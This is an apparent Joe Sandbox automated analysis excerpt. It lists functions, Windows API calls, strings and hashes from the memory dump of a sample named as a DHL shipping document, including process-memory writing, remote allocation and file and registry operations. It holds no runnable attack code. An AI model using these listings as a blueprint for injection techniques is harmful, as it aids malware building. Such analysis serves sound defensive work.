Instruction ID: 07dc7f5f0f5f4911b33aa281501e5d88c8a91fbc5063c3e3ab63908400ada8b7
Opcode Fuzzy Hash: 20bce5fb1908001496069a600c668ee004d2c6edfb822b0cfd1ed1aca21e1b92
Instruction Fuzzy Hash: 89512A74A00209EFCB14DFA8D980ABE7BB5EF55360F208669F9159B291D730ED41CB50

Function 00AC2716 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AC21D0,?,?,00000034,00000800,?,00000034), ref: 00ACB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AC2760

Part of subcall function 00ACB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AC21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00ACB3F8

Part of subcall function 00ACB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00ACB355
Part of subcall function 00ACB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AC2194,00000034,?,?,00001004,00000000,00000000), ref: 00ACB365
Part of subcall function 00ACB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AC2194,00000034,?,?,00001004,00000000,00000000), ref: 00ACB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AC27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AC281A

Strings

@U=u, xrefs: 00AC2760, 00AC27CD, 00AC281A
@, xrefs: 00AC2832

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @$@U=u
API String ID: 4150878124-826235744
Opcode ID: 3f0dd0f6b8013d38df5809475d70fbd90f5c1fadd4775900628280920410903e
Instruction ID: 65004f8c656f1e094bad08a9cc53a92d95d3a05eaca0d6c38ec3ac2cf8136655
Opcode Fuzzy Hash: 3f0dd0f6b8013d38df5809475d70fbd90f5c1fadd4775900628280920410903e
Instruction Fuzzy Hash: 78410972900218AEDB10DFA4C986FEEBBB8AB09700F114099EA55B7181DA716E45CBA1

Function 00AC719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AC7206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AC723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AC724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AC72CF

Strings

DllGetClassObject, xrefs: 00AC7242

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 1494fa6c9391037600e601ace3ded41efb26dc2168a1812bc123e9fb0dda2f7d
Instruction ID: 92f2f21db3a85347cab989d3a349ebd77d14c57951dcb884d1cbd029afe971b2
Opcode Fuzzy Hash: 1494fa6c9391037600e601ace3ded41efb26dc2168a1812bc123e9fb0dda2f7d
Instruction Fuzzy Hash: 7C412971A04204AFDB15CF94C984FAE7BA9EF44710F2680ADBD099F20AD7B1D945CFA0

Function 00AF52C1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00AF5352
GetWindowLongW.USER32(?,000000F0), ref: 00AF5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AF5382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AF53A8

Strings

@U=u, xrefs: 00AF5352

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID: @U=u
API String ID: 3340791633-2594219639
Opcode ID: 6b1d9ee7119e96cfa776e7d7a05562eca6bb037123b3922cf5ff93bdd18ed0cf
Instruction ID: 3e5b44d92dcaa7203870cc5cdf9c337a5ebb979af655559080fd8548890e03b3
Opcode Fuzzy Hash: 6b1d9ee7119e96cfa776e7d7a05562eca6bb037123b3922cf5ff93bdd18ed0cf
Instruction Fuzzy Hash: 39319034E55A0CAFEB249BACCC25BF87765AB05390F584201BB509A1E1C7B49941EB42

Function 00AEC9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AEC9F1
_wcslen.LIBCMT ref: 00AECA68
_wcslen.LIBCMT ref: 00AECA9E
_wcslen.LIBCMT ref: 00AECAF9
_wcslen.LIBCMT ref: 00AECB2F
_wcslen.LIBCMT ref: 00AECB7F

Strings

HKEY_LOCAL_MACHINE, xrefs: 00AECA62, 00AECA67
HKLM, xrefs: 00AECA98, 00AECA9D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen
String ID: HKEY_LOCAL_MACHINE$HKLM
API String ID: 176396367-4004644295
Opcode ID: a3c4d01e272eb1195223236bea4c65fec2ed799b4c9aec6af4b6fc58ce040784
Instruction ID: 19d40c13addf2b84a713387b76b9dfbae68e67b36e9a4cbffd09ca7730011e9c
Opcode Fuzzy Hash: a3c4d01e272eb1195223236bea4c65fec2ed799b4c9aec6af4b6fc58ce040784
Instruction Fuzzy Hash: 5631FB736001EA4BCB21EF6ED9405BF33A35BA17E0B154039E8556B245FA71CD46D3A0

Function 00AF2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AF2F8D
LoadLibraryW.KERNEL32(?), ref: 00AF2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AF2FA9
DestroyWindow.USER32(?), ref: 00AF2FB1

Strings

SysAnimate32, xrefs: 00AF2F68

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: e74246813e4155f6fe5df550138e9a1e1653aee861c589db5b5f7c64bd2a12cd
Instruction ID: 24656e3f1ad14ae42591184aad6e6a4ab058141b641c65ff20eaf057f1c9b407
Opcode Fuzzy Hash: e74246813e4155f6fe5df550138e9a1e1653aee861c589db5b5f7c64bd2a12cd
Instruction Fuzzy Hash: CA219D7122420DABEB219FE4DC80FBB77BDEB59364F104628FA50D61A0D771DC619760

Function 00AF5660 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00AF56BB
_wcslen.LIBCMT ref: 00AF56CD
_wcslen.LIBCMT ref: 00AF56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00AF5816

Strings

@U=u, xrefs: 00AF56BB, 00AF5816

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend_wcslen
String ID: @U=u
API String ID: 455545452-2594219639
Opcode ID: f682680dbecd84db433f2a4d9b3358a13ffd7651d0465edf20b24221a1715e5b
Instruction ID: 8b9ee99cfa0c1ba4792be8f14c116dbc29e44694a615016fca65e942380f0d5d
Opcode Fuzzy Hash: f682680dbecd84db433f2a4d9b3358a13ffd7651d0465edf20b24221a1715e5b
Instruction Fuzzy Hash: DF11B171E0060C96DB20DFF58C85AFE77BCEF11761B10842AFB15D6081EBB48A80CBA0

Function 00A6600E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A6604C
GetStockObject.GDI32(00000011), ref: 00A66060
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A6606A

Strings

@U=u, xrefs: 00A6606A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID: @U=u
API String ID: 3970641297-2594219639
Opcode ID: c6623ad6f6e2e665947897ea629fe198f30384e0a22a655ac91047f3865f4c36
Instruction ID: 46595f1bfc2ce75213eed0504e0c9c38d888a3542363f7e9c56eedc787d8d64b
Opcode Fuzzy Hash: c6623ad6f6e2e665947897ea629fe198f30384e0a22a655ac91047f3865f4c36
Instruction Fuzzy Hash: 9011AD72101508BFEF129FE48C44EEABF7DEF083A5F054225FA0452010D7329C60DBA0

Function 00A84D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A84D1E,00A928E9,?,00A84CBE,00A928E9,00B288B8,0000000C,00A84E15,00A928E9,00000002), ref: 00A84D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A84DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00A84D1E,00A928E9,?,00A84CBE,00A928E9,00B288B8,0000000C,00A84E15,00A928E9,00000002,00000000), ref: 00A84DC3

Strings

mscoree.dll, xrefs: 00A84D86
CorExitProcess, xrefs: 00A84D98

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 967adc2f741801cd95da72ec07fe0970480f072c93b1e6c56d56e2412483dfb4
Instruction ID: 5961c24dd4b8eaf930ed199524ed01b22485d71ea064b77035c412dcc915c4bb
Opcode Fuzzy Hash: 967adc2f741801cd95da72ec07fe0970480f072c93b1e6c56d56e2412483dfb4
Instruction Fuzzy Hash: 94F04F34A4020DBBDB11AFD1DD49BAEBFF5EF48761F0001A4F805A26A0CB745D55CB95

Function 00A64E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A64EDD,?,00B31418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A64E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A64EAE
FreeLibrary.KERNEL32(00000000,?,?,00A64EDD,?,00B31418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A64EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00A64EA8
kernel32.dll, xrefs: 00A64E94

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 17fd1b17e7aae4cd5ed7aa128b3a07aa8642c794ef26b72b90c481417c4c6b9e
Instruction ID: 41ce3b2583e22eacbea81ae779015487ed46138f9babeed7aaa6e4a586c1af7f
Opcode Fuzzy Hash: 17fd1b17e7aae4cd5ed7aa128b3a07aa8642c794ef26b72b90c481417c4c6b9e
Instruction Fuzzy Hash: 28E0CD35E055365BD23157A67D18BBF65B4BF85F727050215FD04D2114DB68CD02C0A4

Function 00A64E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA3CDE,?,00B31418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A64E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A64E74
FreeLibrary.KERNEL32(00000000,?,?,00AA3CDE,?,00B31418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A64E87

Strings

kernel32.dll, xrefs: 00A64E5B
Wow64RevertWow64FsRedirection, xrefs: 00A64E6E

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 05c23ff113ed9d0ed6dea11b191bf8f28c5b53ab70df4dd581fd31274a5e5321
Instruction ID: 9432a9389c164b5be8b00d99c6eb1301546d8de55fe70c2c201f70a01fa87571
Opcode Fuzzy Hash: 05c23ff113ed9d0ed6dea11b191bf8f28c5b53ab70df4dd581fd31274a5e5321
Instruction Fuzzy Hash: 15D02B395026366BC6321BA67C1CDEF6A38BF89F313050711F904E2110CF25CD12C1D4

Function 00AD2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AD2C05
DeleteFileW.KERNEL32(?), ref: 00AD2C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AD2C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AD2CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AD2CC0

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 23e734f3b2fe84adc15a8909f3d7504877813cd12ae0140230397490d5a3fab7
Instruction ID: 78b6e65603bd6b37875f9a95d2b3f4cbea6d72aaf3a976bd25d9f2828e53346c
Opcode Fuzzy Hash: 23e734f3b2fe84adc15a8909f3d7504877813cd12ae0140230397490d5a3fab7
Instruction Fuzzy Hash: 3FB13D72D00119ABDF21EBA4CD85EEEB7BDEF59350F1040A6F50AE7251EA309A44CB61

Function 00AEA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00AEA427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AEA435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AEA468
CloseHandle.KERNEL32(?), ref: 00AEA63D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: ad4273b7eb60f5a47dda4459a89ecee69ed40d4aa3f9de31bbe3933ff5b06574
Instruction ID: 9fe0de3c928b5a39f7fd8dede2c4bcae09269e7841c017482f43751a96f62589
Opcode Fuzzy Hash: ad4273b7eb60f5a47dda4459a89ecee69ed40d4aa3f9de31bbe3933ff5b06574
Instruction Fuzzy Hash: 10A1BE71604300AFD720DF29C986F2AB7E1AF94714F14885DF59A9B292D7B0EC41CB92

Function 00A9BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B03700), ref: 00A9BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00B3121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A9BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00B31270,000000FF,?,0000003F,00000000,?), ref: 00A9BC36
_free.LIBCMT ref: 00A9BB7F

Part of subcall function 00A929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9D7D1,00000000,00000000,00000000,00000000,?,00A9D7F8,00000000,00000007,00000000,?,00A9DBF5,00000000), ref: 00A929DE
Part of subcall function 00A929C8: GetLastError.KERNEL32(00000000,?,00A9D7D1,00000000,00000000,00000000,00000000,?,00A9D7F8,00000000,00000007,00000000,?,00A9DBF5,00000000,00000000), ref: 00A929F0

_free.LIBCMT ref: 00A9BD4B

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: fb88a3f545fec061d8f8ae9072bcf4a9e31f70cb2541e3c90e7cbce89ef07e9f
Instruction ID: e4a3014fd828ea43e9b63ff3a3d5372a0e6d2f57db54fab67e87be5a92bca391
Opcode Fuzzy Hash: fb88a3f545fec061d8f8ae9072bcf4a9e31f70cb2541e3c90e7cbce89ef07e9f
Instruction Fuzzy Hash: C751C971A10209EFCF10EF69AE819AFB7FCEF44760B10466AE554D71A1EB709D418BA0

Function 00ACE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ACCF22,?), ref: 00ACDDFD

Part of subcall function 00ACDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ACCF22,?), ref: 00ACDE16

Part of subcall function 00ACE199: GetFileAttributesW.KERNEL32(?,00ACCF95), ref: 00ACE19A

lstrcmpiW.KERNEL32(?,?), ref: 00ACE473
MoveFileW.KERNEL32(?,?), ref: 00ACE4AC
_wcslen.LIBCMT ref: 00ACE5EB
_wcslen.LIBCMT ref: 00ACE603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00ACE650

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: f88a80579b929f8f13b5ea7d2976651469a4cbda3c35879828755e980c7b0152
Instruction ID: e8b1f223193cfc1eec0e012a3392a38434a222dcdcb215c813fb9ab5992048a1
Opcode Fuzzy Hash: f88a80579b929f8f13b5ea7d2976651469a4cbda3c35879828755e980c7b0152
Instruction Fuzzy Hash: 0E5163B24087455BC724EBA0DD81EDFB3ECAF94350F00492EF589D3191EF75A6888766

Function 00AEB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

Part of subcall function 00AEC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEB6AE,?,?), ref: 00AEC9B5
Part of subcall function 00AEC998: _wcslen.LIBCMT ref: 00AEC9F1
Part of subcall function 00AEC998: _wcslen.LIBCMT ref: 00AECA68
Part of subcall function 00AEC998: _wcslen.LIBCMT ref: 00AECA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AEBAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AEBB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AEBB63
RegCloseKey.ADVAPI32(?,?), ref: 00AEBBA6
RegCloseKey.ADVAPI32(00000000), ref: 00AEBBB3

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 5fc05a85cf8628687df29512f1991df25f35ff02a7afccb0e1731bfd923429d4
Instruction ID: 6032df854121847e889a5d6cfe9561d660a6fe594a673f5ee0006bb15b631b1c
Opcode Fuzzy Hash: 5fc05a85cf8628687df29512f1991df25f35ff02a7afccb0e1731bfd923429d4
